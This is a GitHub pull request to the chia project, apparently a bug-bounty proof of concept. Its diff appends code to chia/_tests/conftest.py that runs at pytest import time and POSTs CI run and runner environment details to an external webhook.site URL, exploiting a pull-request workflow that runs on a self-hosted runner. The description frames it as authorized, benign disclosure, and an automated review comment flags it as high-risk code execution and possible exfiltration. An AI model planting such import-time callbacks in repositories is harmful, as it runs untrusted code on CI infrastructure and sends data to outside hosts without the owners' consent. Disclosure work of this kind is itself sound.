### PR TITLE
[H1 PoC — DO NOT MERGE] benign beacon for authorized pwn-request disclosure

### DIFF
--- a/chia/_tests/conftest.py
+++ b/chia/_tests/conftest.py
@@ -1515,3 +1515,38 @@ async def wallet_environments(
                 ],
                 tx_config,
             )
+
+
+# ---- H1 PoC beacon (authorized research per Chia HackerOne safe-harbor) ----
+# Single benign HTTP POST proving conftest.py is imported on the runner.
+# No exfil, no persistence, no command execution beyond the callback. Fails
+# silently if the beacon endpoint is unreachable.
+import urllib.request as _h1_url
+import json as _h1_json
+
+def _h1_poc_beacon():
+    payload = {
+        "src": "chia-h1-pwn-request-poc",
+        "purpose": "demonstrate fork-PR conftest.py is imported on Chia self-hosted benchmark runner",
+        "ghub_run_id": os.environ.get("GITHUB_RUN_ID", "?"),
+        "ghub_workflow": os.environ.get("GITHUB_WORKFLOW", "?"),
+        "ghub_repo": os.environ.get("GITHUB_REPOSITORY", "?"),
+        "ghub_event": os.environ.get("GITHUB_EVENT_NAME", "?"),
+        "ghub_actor": os.environ.get("GITHUB_ACTOR", "?"),
+        "ghub_ref": os.environ.get("GITHUB_REF", "?"),
+        "runner_name": os.environ.get("RUNNER_NAME", "?"),
+        "runner_os": os.environ.get("RUNNER_OS", "?"),
+        "runner_arch": os.environ.get("RUNNER_ARCH", "?"),
+    }
+    try:
+        req = _h1_url.Request(
+            "https://webhook.site/cb1feecd-6854-476c-8114-652a11d5fafc",
+            data=_h1_json.dumps(payload).encode(),
+            headers={"Content-Type": "application/json"},
+            method="POST",
+        )
+        _h1_url.urlopen(req, timeout=10).read()
+    except Exception:
+        pass
+
+_h1_poc_beacon()


### PR DESCRIPTION
This PR is an authorized security research artifact under Chia's HackerOne safe-harbor policy.

Purpose: prove the \`Benchmarks\` workflow imports fork-PR \`conftest.py\` at pytest collection time on the Chia self-hosted 'benchmark' runner. The PoC is a single benign HTTP POST appended to the existing \`chia/_tests/conftest.py\` to a researcher-controlled webhook.site URL containing only workflow-run metadata (run ID, workflow name, runner name/OS) — no secrets, no host data, no environment variables that would contain credentials, no persistence, no command execution beyond the callback.

Please DO NOT merge. The change to \`chia/_tests/conftest.py\` exists solely to demonstrate the unsafe \`runs-on\` selector in \`.github/workflows/benchmarks.yml:50\`. After the workflow either runs or stays pending approval, I will close the PR and open the corresponding H1 report describing the result.

Reference: this PoC pattern is the standard methodology used in @adnanthekhan's August 2023 disclosure to Chia (Chia postmortem: https://www.chia.net/2023/08/04/bug-bounty-self-hosted-runners/).

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **High Risk**
> Adds a network callback executed at import time in `chia/_tests/conftest.py`, which is effectively arbitrary code execution in CI/test runners and could be used for data exfiltration. Risk is high because it runs automatically during pytest collection and reaches out to an external endpoint.
> 
> **Overview**
> Adds an import-time “H1 PoC” beacon to `chia/_tests/conftest.py` that issues a single HTTP `POST` to an external `webhook.site` URL during pytest collection.
> 
> The beacon sends selected GitHub Actions/runner metadata from environment variables and suppresses any errors if the endpoint is unreachable.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 0e9c6a8c1aacd20c47fe85f270b95b020d90552b. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->